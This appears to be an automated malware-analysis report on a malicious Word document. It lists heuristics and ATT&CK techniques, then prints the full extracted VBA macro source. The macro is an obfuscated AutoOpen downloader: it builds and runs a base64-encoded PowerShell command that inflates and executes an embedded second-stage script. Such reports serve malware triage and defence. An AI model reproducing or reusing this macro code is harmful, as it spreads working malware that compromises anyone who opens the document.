MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the BjPltPav function, which uses the Shell() function to execute a command. This command appears to be constructing a string that likely results in downloading and executing a second-stage payload. The specific command string is partially obfuscated but includes 'vbFkai + powers', suggesting a PowerShell execution.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
Next BjPltPav = cjTLdQiMkzU + Shell(vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + jATWWtRft + hXUZAbip + dhiZTz + SjwCFiRXE, 67765 - 67765) For kbUul = NojaJ To AJRJEK -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub Autoopen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12616 bytes |
SHA-256: 18f783f27469e7d652a1968a748478fe043e59aa693b91d40390695d960a83e0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GrskhWwiI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BjPltPav()
On Error Resume Next
For qqRiW = GhwVj To RsGzp
For YAMGIQ = YWibTE To 48241
KkaAsu = (88725 / CBool(rirzVT) - tTmha / Oct(66325 / Hex(86928) / hApwDb + Rnd(cRHWH / Fix(37))))
Next
fzzwi = 30039 - 40577
Next
For QRXETl = jWwJR To tzCwqJ
For CarwMt = UplwS To 46358
RjStj = (80096 / CBool(vvJMqJ) - zuAnFj / Oct(48839 / Hex(81574) / YsaXnr + Rnd(BrsqcP / Fix(37))))
Next
CHUoGf = 64246 - 73199
Next
BjPltPav = cjTLdQiMkzU + Shell(vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + jATWWtRft + hXUZAbip + dhiZTz + SjwCFiRXE, 67765 - 67765)
For kbUul = NojaJ To AJRJEK
For VzSKj = zflvS To 21953
mWpwSw = (97888 / CBool(dEHBGp) - wCiBU / Oct(47945 / Hex(31105) / RRkjo + Rnd(btQPQI / Fix(37))))
Next
TVqILQ = 84446 - 86480
Next
End Function
Sub Autoopen()
On Error Resume Next
For IdWvj = QRrTVw To iiMKN
For Kqmpj = fjntI To 15825
fGJHN = (87205 / CBool(sczYzm) - vrIvBC / Oct(79514 / Hex(65678) / WnpWB + Rnd(dXiLz / Fix(37))))
Next
RVazR = 32631 - 20123
Next
BjPltPav
For qOsutk = iwHFiz To mTYXvp
For cploMd = hvkli To 111
IvucRN = (97045 / CBool(aGOVj) - HbuVUi / Oct(28319 / Hex(46436) / FhGTw + Rnd(XTEzH / Fix(37))))
Next
XduicB = 6659 - 28911
Next
End Sub
Attribute VB_Name = "aqznaUpQJRP"
Function mbhjLO()
On Error Resume Next
For sfkknb = FGBap To hkaiZ
For qTLvQ = psKjNU To 90880
wwPXXV = (70445 / CBool(kldJjp) - fiIVV / Oct(73261 / Hex(34702) / kTwziH + Rnd(tjfPN / Fix(37))))
Next
VDLDlJ = 68172 - 49693
Next
rUdAbUdo = "HeLL -e IAAoAG" + "4AZQBX" + "AC0ATwBCAEoARQB" + "DAHQAIAAgAFMAe" + "QB" + "zAF" + "QAZQBtA"
For GHzoi = Ezaoj To fDbXC
For OsziR = SKbzRj To 54746
HSMozt = (55723 / CBool(phEah) - pzkjj / Oct(70869 / Hex(40131) / UcpXWU + Rnd(GhqLzH / Fix(37))))
Next
rmZIv = 96071 - 6582
Next
DbozKaYhlw = "C4ASQBPAC4AQw" + "BPAG0AcABSAEUAc" + "wBTAGkATwBOAC4A" + "RABF" + "AGYAbABBAFQ" + "ARQBzAFQAcgBlA" + "EEAbQAo" + "AFsA"
For ZqvwU = NkArNa To kzaXIm
For zOPjOc = wGapW To 57440
CzcZz = (4623 / CBool(zqUkhP) - nzlnL / Oct(39995 / Hex(30785) / bLisT + Rnd(dZCqw / Fix(37))))
Next
hzzzJk = 79839 - 4402
Next
tDLDfi = "UwB" + "ZAFMAdABF" + "AG0ALgBpAG" + "8AL"
For uzhNB = HpCLJ To rXQqGj
For TQRtkW = nCnda To 60156
mjMBi = (32801 / CBool(WjAfn) - qbjHC / Oct(1796 / Hex(22676) / HcFwrd + Rnd(FCYkd / Fix(37))))
Next
FqEpbS = 48499 - 95307
Next
oJjbFO = "gBNAGUATQB" + "vA" + "FIAWQBzAHQ" + "AcgBlAG" + "EAbQB"
For ROzSiL = jaaTf To DGFnnh
For jcuJc = kcRaim To 71213
LrwYuL = (69128 / CBool(zKKwZ) - zkoisj / Oct(916 / Hex(79067) / opzbt + Rnd(ArjuF / Fix(37))))
Next
PGOsVj = 19856 - 58614
Next
KzUiztjBnGr = "dAFsAcwBZ" + "AHMA" + "VABlAG0A" + "LgBjAG8AbgBWA" + "GUAUgBUAF0A" + "OgA6AGY" + "AUgBPAE0AYgB" + "BA" + "HMARQA2" + "ADQAUwB"
For zjLzfh = EuEZWY To jzkqI
For TdCUui = ZlWAqK To 68559
JmdOhN = (75742 / CBool(pfVqwf) - lpChQV / Oct(58783 / Hex(81817) / wDNSY + Rnd(jLoVa / Fix(37))))
Next
Hcajf = 82658 - 23252
Next
pOGXJZJzfV = "0AHIAaQBOAEcAK" + "AAg" + "ACcAVgBa" + "AEIAdAB" + "UADgASgBB" + "AEQATQ" + "BlAC8AeQByADE" + "AWQ" + "BzAGkAMw"
For Zrhtql = ndSTi To aRdAVO
For vJCaFj = NbzkiS To 2408
FVUbmt = (91551 / CBool(VCvPjL) - jKcatP / Oct(79300 / Hex(13537) / GHzMjh + Rnd(MuwMHf / Fix(37))))
Next
brAbjY = 19854 - 38483
Next
QiVKiZzuh = "BLAEw" + "AWQ" + "BaAEUAaABN" + "AFUARQBlAFQA" + "QQBZAE0AOABLAG" + "oAbwBEAEUAe" + "AB0ADEAdABoAEIA" + "KwBOAHU" + "AMwBoAF" + "UAS"
For BiNaCs = OPOjV To wjBnOj
For kzpDR = isoIi To 56110
KvhTHm = (38183 / CBool(iwtzXw) - RZsJaw / Oct(23599 / Hex(4394) / JIBJOa + Rnd(fDjUB / Fix(37))))
Next
ijcPj = 4605 - 5487
Next
SWduE = "ABFAHIANgA3A" + "EIA" + "NABMA" + "EUATgAwADMAYQAz" + "ADcALwB0AHYA" + "MwBXAHc" + "AdQBXAEEAZABjA" + "GsAOABrAEYA" + "QwBVAFYAT" + "AA0A"
mbhjLO = rUdAbUdo + DbozKaYhlw + tDLDfi + oJjbFO + KzUiztjBnGr + pOGXJZJzfV + QiVKiZzuh + SWduE
End Function
Function QNWtNwqq()
On Error Resume Next
For EtEnbO = ZCowt To KwkJXH
For NvocuP = MhLPJz To 87220
OwWnL = (83959 / CBool(BuVHJ) - hrFLu / Oct(26485 / Hex(67277) / FbsMX + Rnd(rqZot / Fix(37))))
Next
Fknnkv = 95042 - 12056
Next
wnMOQTS = "EEAagAwAFU" + "AdwB" + "tAGE" + "AaABVA" + "DYAVQBYAC" + "sAcABYAHc" + "AZ" + "gAvADIAWABC" + "AHI"
For tHmGTf = FDPlKv To Vdaoo
For KVjNJ = zDSbw To 31442
OLUGFD = (44509 / CBool(lVZIo) - aSJJH / Oct(16489 / Hex(82328) / XaYwAi + Rnd(nbQVhh / Fix(37))))
Next
AXVkRO = 47929 - 193
Next
bsIVvUq = "ARQ" + "BGAGEAMABDAD" + "AAZwBuAEUARAB" + "jAHoAQQBSAEoAR" + "ABwA" + "DYA" + "KwBp" + "AFIAdABzAEsAMwB" + "SAFEAeA" + "ByAHcAVwBC"
For FVIWk = SrHld To thIDoN
For uImHcc = lnWqc To 22229
TTbrL = (4157 / CBool(JZNvEK) - qMhdA / Oct(52037 / Hex(11132) / SOjuTW + Rnd(VQJSPa / Fix(37))))
Next
hLcLT = 71476 - 68979
Next
atiZH = "AEsA" + "RQBTAFcAVQB" + "LA" + "DUAVwB"
For LYRKv = oNbkRV To NLRiH
For Dwmluj = fVAoHU To 27604
DIcIaD = (61831 / CBool(hhwFM) - ALcLG / Oct(61406 / Hex(55447) / mXdTv + Rnd(NnczG / Fix(37))))
Next
KCoaj = 51030 - 45748
Next
UsmMkPuX = "3AGMATQAwAGYAZQ" + "BzAEUAOQBW" + "AE4AZ" + "AB3AGcAWQB" + "OAE0" + "AbAB5AGIASQ" + "A4"
For EEwbPL = oLwNi To dWFfH
For NpuEA = EJzXCi To 61898
jUhaB = (7505 / CBool(zYbjjY) - jjivZR / Oct(20422 / Hex(7096) / zvdLB + Rnd(RJRha / Fix(37))))
Next
JofdDZ = 30792 - 33165
Next
KcISw = "AFQAZQAwAD" + "QAVwBoAFoAb" + "gB4AG" + "IATQBxAGcAMAAwA" + "EEAUQBDAE0AYwA" + "vA" + "EgAcABuAHEAaAB" + "hAHgA" + "MgByA"
For YRZLd = oHFOz To KiiYsh
For GSPBw = XsCRV To 85581
mqbiDz = (46145 / CBool(dBLTc) - wFAEL / Oct(83395 / Hex(83322) / BIPbA + Rnd(YlpjV / Fix(37))))
Next
tUHAU = 86059 - 19016
Next
sDWzjGFrEI = "GUAQwAz" + "ADQAMABsAE" + "EASgBH" + "AEIAV" + "ABsADE" + "AUwBqAD" + "YAbgB2AHoAeABtA" + "FQAVw" + "BuA"
For dQDiV = YmCNK To DbpSO
For zRjrMc = ZHiwAj To 35218
ajkEhG = (80215 / CBool(ljcYUz) - iolst / Oct(85643 / Hex(64677) / EblvCu + Rnd(BdsTcv / Fix(37))))
Next
NhVJj = 95009 - 14403
Next
wvbRfOIsaXc = "DEAdwBkADYARw" + "BOAHgAbgBi" + "AEQAbwBZ" + "AGYAdwBZ" + "AH" + "UASABlA" + "GEAWgBRAE" + "0AKwB0AHU" + "AMwA3AG8ANABFA"
For DcaqzJ = rYosu To dwKmnz
For wjBWVZ = DWjJkf To 40043
IVMvd = (72125 / CBool(TikBZk) - LWwzYl / Oct(44827 / Hex(52685) / UZiMU + Rnd(fIPKEn / Fix(37))))
Next
arTzMM = 43139 - 74221
Next
dRbfodk = "HMAMw" + "BhAG4AQgByA" + "DAAeg" + "BrAGUAVABRADkAd" + "QB2AEoAdAByAF" + "UAcQBuAGMAVgBjA" + "HUA" + "MwBWAHAA" + "QQ"
For AqSLN = kGjBh To rVvZS
For wbmOfz = wEfbY To 21011
QzYsu = (17119 / CBool(SXIbDG) - iVYXu / Oct(64818 / Hex(45220) / imKUp + Rnd(IFiKq / Fix(37))))
Next
BrzCfJ = 5322 - 61967
Next
sDGiXqPEzLM = "BuADUAagBr" + "AFoASABRAFEAZwB" + "2ADIA" + "cg" + "AyAHo" + "AcAB4AGMARQ" + "BmA"
QNWtNwqq = wnMOQTS + bsIVvUq + atiZH + UsmMkPuX + KcISw + sDWzjGFrEI + wvbRfOIsaXc + dRbfodk + sDGiXqPEzLM
End Function
Function jATWWtRft()
On Error Resume Next
For dnbrw = iGEid To FRmhZT
For JSiQN = WqYWsl To 59503
HFzjcq = (6808 / CBool(wajMuv) - KVFprW / Oct(72230 / Hex(97012) / NNcWJ + Rnd(LtwqwL / Fix(37))))
Next
wzdHiT = 8447 - 68771
Next
adcwdJVc = "GYAZA" + "B0AGYASAB" + "jAGIASA" + "BNAEsARwAzAEQ" + "ARABtAGYAWABKAG" + "UATwBvADUA" + "MwBjAFUAZw" + "BOAGkAMABpAEoAU" + "ABsADkAZ"
For jaPOA = vnUVHc To PNjRO
For nOEwP = XIMkn To 34693
mNdBGu = (68917 / CBool(zLVdE) - chPaR / Oct(9922 / Hex(80578) / mfiArd + Rnd(jChDNp / Fix(37))))
Next
mLaWi = 79985 - 80038
Next
IdVjIYol = "wA3ADkA" + "RAB" + "2AGQAMgBk" + "AG4A" + "awBkAGIAcQ" + "BwAEMAWgBZAHMA" + "bQBqAHk" + "ATwBDAH"
For jTLLu = wJVMEq To wXFCGu
For IoZrV = vDAua To 599
ivLpj = (66683 / CBool(msLqI) - hnoUUX / Oct(90521 / Hex(52622) / vtUqZj + Rnd(JbmDjs / Fix(37))))
Next
LQWXr = 52976 - 29461
Next
aMRGrLnEi = "MAcA" + "BTAE0AMQBSA" + "EMAMwBrADM" + "AUABPAHYAeQBXAG" + "0AcABIAH"
For jiWnHP = aCFfnA To VqIXt
For jEFPpk = DzADzf To 35641
lTmYd = (58246 / CBool(jwEEC) - vjPUhj / Oct(85979 / Hex(59423) / GzWmbc + Rnd(BfHiI / Fix(37))))
Next
WWwQEi = 39972 - 12556
Next
zMmFU = "cANgBSAGEAUwB" + "6ADEAd" + "ABPA" + "EoAZwB6AEwAawB" + "jAHgAb" + "gBiAEwA"
For kijIR = jSzZfI To oCrCY
For zYwUlL = sVRbJ To 19458
vNnDT = (21314 / CBool(RNIId) - JhwZCK / Oct(76770 / Hex(18090) / oOzwHr + Rnd(AYQVm / Fix(37))))
Next
bOnjN = 28919 - 59926
Next
CbsNt = "TQB0AH" + "gAegBoAGoAegB" + "kAEYAVgBvAGc" + "AbABGAE"
jATWWtRft = adcwdJVc + IdVjIYol + aMRGrLnEi + zMmFU + CbsNt
End Function
Function hXUZAbip()
On Error Resume Next
For oLIlA = ZsZzW To IYYFW
For ZEMjs = nsGhl To 35812
YiczCp = (21746 / CBool(jnIzQ) - ZJCpiN / Oct(18557 / Hex(79110) / wETAzI + Rnd(sGGCz / Fix(37))))
Next
fZVPKz = 87049 - 31478
Next
SKpZuJnZ = "oAbABrAEQAZwB" + "mAHQATA" + "AzAGgAawBLAE4" + "AUQBrAGsAYQAy" + "AGc" + "AOAAwAGgAMwB"
For kbJOi = rCFnj To iujpN
For bvCsOB = ddTTCM To 92061
uUsqj = (49786 / CBool(BEBPN) - BimZzz / Oct(34287 / Hex(40225) / rNHXF + Rnd(XjCan / Fix(37))))
Next
karwiX = 49125 - 89244
Next
TUjStiw = "PADkALwBBAEEAP" + "QA9ACcAIAAp" + "AC" + "AALABb" + "AEkATwAu" + "AEMATwBN" + "AFAAcgBFAHMAcw"
For rwnLbz = tFMips To iiLUcd
For woZmQ = vaSbs To 50981
AOTMd = (49786 / CBool(pzOJDs) - MPSDzQ / Oct(56374 / Hex(86337) / OYLwl + Rnd(mllPo / Fix(37))))
Next
PPzqCn = 59700 - 1500
Next
TdPjER = "BpAE8ATgA" + "uAEMAb" + "wBtAFAAU" + "gBlAFMAUwBJ" + "AG8ATgBNA" + "E8ARABFAF0AOgA"
For PjYFiK = YvJaH To FnSdE
For LcYoD = wATMu To 56963
skwpmr = (4889 / CBool(mMqFN) - LJLYY / Oct(66178 / Hex(16039) / zrvUil + Rnd(jLAjc / Fix(37))))
Next
UHwjm = 4384 - 27856
Next
KVXzjj = "6AEQARQBjAE8Ab" + "QBwAHIARQ" + "BzA" + "FMA" + "KQB8AGYATwBSA" + "EUAQQBDAEgAI" + "AB" + "7ACAAbgBlA" + "FcA" + "LQBPA"
hXUZAbip = SKpZuJnZ + TUjStiw + TdPjER + KVXzjj
End Function
Function dhiZTz()
On Error Resume Next
For QhiqD = rIoVvp To mGuRI
For wFBqZ = EqCMsm To 61801
QhKMif = (488 / CBool(YXikm) - hAEOd / Oct(72570 / Hex(31006) / OrJEw + Rnd(pvvjPw / Fix(37))))
Next
FwhndQ = 61378 - 64922
Next
RJkHD = "EIASg" + "BFAEMAdAAg" + "AEkATwAuAF" + "MAdABSAGUAY"
For LozrJB = dIudz To TDZjF
For cbuVqa = EWbAVk To 71866
fUFHln = (74746 / CBool(bUSon) - iNzKCE / Oct(4814 / Hex(32909) / IQhzl + Rnd(IYtLh / Fix(37))))
Next
iTYTpp = 17786 - 36765
Next
whapps = "QBNAFIAZQBB" + "AEQAZQBSACgA" + "IAAkAF8AIAAs" + "ACAAWwBUAEUAW" + "AB" + "UAC4AZ" + "QBuAEMAbwB" + "kAGkA" + "bg" + "BHAF0AOgA"
For Xlobs = CKhji To BzrDq
For QTvYd = pvtZq To 25108
tzRki = (86114 / CBool(toFOL) - zZjWhQ / Oct(98369 / Hex(78204) / zFzIjl + Rnd(TdTURo / Fix(37))))
Next
kMMLU = 15795 - 53140
Next
MzvWzlj = "6AGEAUwBjAG" + "kAaQApAH0AfAAgA" + "EYATwBS" + "AGUAYQBD" + "AGgAIAB7AC" + "AAJABfAC4A" + "cgBFAGEARABUAE" + "8ARQBOAEQAK" + "AAgACkAIAB9AC" + "AAKQB8ACYAKAAgA"
For hMzFP = XraNa To wMlWJ
For wUcurO = JwKUF To 58707
RmYmLi = (42273 / CBool(wlsGro) - XaqBk / Oct(22584 / Hex(13909) / mVjuGT + Rnd(XVjti / Fix(37))))
Next
ozLfN = 29501 - 45643
Next
iuTSNjzAko = "CgAWwBTAFQAcg" + "BJAE4ARwBdACQA" + "dgBFAFIAQgB" + "vAFMA"
For BkWVqY = iDtUKB To QbjPNj
For WXzGG = bfWWwj To 89793
kMYQvd = (86163 / CBool(pZYKC) - jvwBob / Oct(59543 / Hex(26400) / PkoIw + Rnd(WYaGAj / Fix(37))))
Next
KwSGV = 8214 - 64619
Next
upkznorp = "ZQ" + "BQ" + "AFI" + "AZQ"
dhiZTz = RJkHD + whapps + MzvWzlj + iuTSNjzAko + upkznorp
End Function
Function SjwCFiRXE()
On Error Resume Next
For iwjsv = XuvSFW To JfGUtm
For AzDBB = lAihG To 51335
BjoHPD = (10206 / CBool(dfnvJc) - SMlbR / Oct(28658 / Hex(44534) / sirbpX + Rnd(NMiqk / Fix(37))))
Next
rwFqhT = 45150 - 33993
Next
NfONGqsJMPG = "BGAGUAcgBlAG4" + "AYwBlAC" + "kAWwAxACwAMwB" + "dACsAJwB4ACc" + "ALQBKAE8AaQBOA" + "CcAJwApAA=="
SjwCFiRXE = NfONGqsJMPG
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.